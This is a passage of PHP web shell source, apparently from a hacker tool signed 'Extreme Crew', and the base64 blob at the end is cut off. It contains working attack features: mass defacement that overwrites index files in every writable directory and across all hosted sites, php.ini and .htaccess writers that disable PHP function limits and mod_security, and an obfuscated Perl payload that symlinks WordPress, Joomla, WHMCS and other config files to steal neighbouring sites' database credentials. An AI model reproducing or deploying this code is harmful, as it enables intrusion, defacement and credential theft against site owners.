578 echo "[<font color=lime>DONE</font>] $lokasi<br>";
579 file_put_contents($lokasi, $isi_script);
580 $idx = sabun_massal($dirc,$namafile,$isi_script);
581 }
582 }
583 }
584 }
585 }
586 }
587 function sabun_biasa($dir,$namafile,$isi_script) {
588 if(is_writable($dir)) {
589 $dira = scandir($dir);
590 foreach($dira as $dirb) {
591 $dirc = "$dir/$dirb";
592 $lokasi = $dirc.'/'.$namafile;
593 if($dirb === '.') {
594 file_put_contents($lokasi, $isi_script);
595 } elseif($dirb === '..') {
596 file_put_contents($lokasi, $isi_script);
597 } else {
598 if(is_dir($dirc)) {
599 if(is_writable($dirc)) {
600 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
601 file_put_contents($lokasi, $isi_script);
602 }
603 }
604 }
605 }
606 }
607 }
608 if($_POST['start']) {
609 if($_POST['tipe_sabun'] == 'mahal') {
610 echo "<div style='margin: 5px auto; padding: 5px'>";
611 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
612 echo "</div>";
613 } elseif($_POST['tipe_sabun'] == 'murah') {
614 echo "<div style='margin: 5px auto; padding: 5px'>";
615 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
616 echo "</div>";
617 }
618 } else {
619 echo "<center>";
620 echo "<form method='post'>
621 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
622 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
623 <font style='text-decoration: underline;'>Folder:</font><br>
624 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
625 <font style='text-decoration: underline;'>Filename:</font><br>
626 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
627 <font style='text-decoration: underline;'>Index File:</font><br>
628 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Extreme Crew</textarea><br>
629 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
630 </form></center>";
631 }
632} elseif($_GET['do'] == 'mass_helper'){
633 echo "<center>";
634echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
635echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
636echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
637echo "<form method=POST>
638<help title='the file you want to put in all sites'> Def page name : </help>
639 <input title='the file name you want to put in all sites' type=text name=index value=bie.htm> |
640<help title='your deface page's source code'>Def source code :</help>
641 <input title='your index source code' type='text' name='source' value='index.txt'><br><br>
642<help>List DocumentRoot from httpd.conf : </help><br>
643<input type=text name=dirs size=\"40\">
644<br><br>
645<help>List ServerName from httpd.conf : </help><br>
646<input type=text name=sites size=\"40\">
647<br><br>
648<center><input class='but' type=submit value='Generate ' name='go'></center>
649</form>
650<br/>";
651echo "</center>";
652if($_POST['go']){
653echo "<b></b>";
654$index = $_POST['index'];
655$source = $_POST['source'];
656$dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
657$sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
658
659// preparing perl script
660
661if($_POST['dirs']){
662
663
664 $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
665 $perl_start = "#!/usr/bin/perl";
666 $perl_end = "print\"All Defaced !\";";
667 fwrite ($perl,$perl_start."\n\n"); // Write !!
668
669foreach($dirs as $dir){
670
671$result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
672fwrite ($perl, $result."\n");
673flush();
674}
675 echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
676 echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
677 fwrite ($perl, "\n".$perl_end);
678 fclose($perl);
679
680 }
681 // preparing sites list
682
683if($_POST['sites']){
684
685
686 $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
687 $sitess_start = "http://";
688 $sitess_end = "/";
689 fwrite ($sitess,"");
690
691foreach($sites as $site){
692
693 $result2 = $sitess_start.@kill($site).$sitess_end.$index;
694 fwrite ($sitess, $result2."\n");
695 flush();
696}
697 echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
698 fwrite ($sitess,"");
699 fclose($sitess);
700
701}
702 }
703function kill($value){ return str_replace(array("\n","\r"),"",$value); }
704function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
705function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
706echo "<br />";
707echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
708
709} elseif($_GET['do'] == 'bypass'){
710 echo "<center>";
711 echo "<form method=post><input type=submit name=ini value='php.ini' /> <input type=submit name=htce value='.htaccess' /></form>";
712 if(isset($_POST['ini']))
713{
714 $file = fopen("php.ini","w");
715 echo fwrite($file,"disable_functions=none
716safe_mode = Off
717 ");
718 fclose($file);
719 echo "<a href='php.ini'>click here!</a>";
720} if(isset($_POST['htce']))
721{
722 $file = fopen(".htaccess","w");
723 echo fwrite($file,"<IfModule mod_security.c>
724SecFilterEngine Off
725SecFilterScanPOST Off
726</IfModule>
727 ");
728 fclose($file);
729 echo "htaccess successfully created!";
730}
731 echo"</center>";
732} elseif($_GET['do'] == 'convh')
733 {
734@mkdir('ecboss', 0755);
735@chdir('ecboss');
736 $elesem = ".htaccess";
737 $elakab = "$elesem";
738 $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
739 $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
740
741AddType application/x-httpd-cgi .ler
742
743AddHandler cgi-script .ler
744AddHandler cgi-script .ler";
745 fwrite ( $filhat , $htcont ) ;
746 fclose ($filhat);
747$config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KCjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+Cjx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OwogdGV4dC1hbGlnbjogY2VudGVyOwp9Cjwvc3R5bGU+CjwvaGVhZD4KJzsKCgpwcmludCAnCjxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPgo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOwpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOwpmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7CiAgICBteSAkaXNEaXIgPSAwOwogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsKJHNpdGVzcyA9ICRfOwoKCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atc2hvcHBpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdQLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtcHJlc3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtV29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1wcm90YWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1zaXRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtbWFpbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Rlc3Qvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLXRlc3QudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvby9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW1haW4udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12YjF+Y29uZmlnLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWluY2x1ZGVzLXZiLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocDIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS13aG1jcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY3BhbmVsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdWJtaXR0aWNrZXQucGhwJywkc2l0ZXNzLictd2htY3MyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudGVzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmcudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teXNob3AvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXlzaG9wLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLVpDc2hvcC50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGV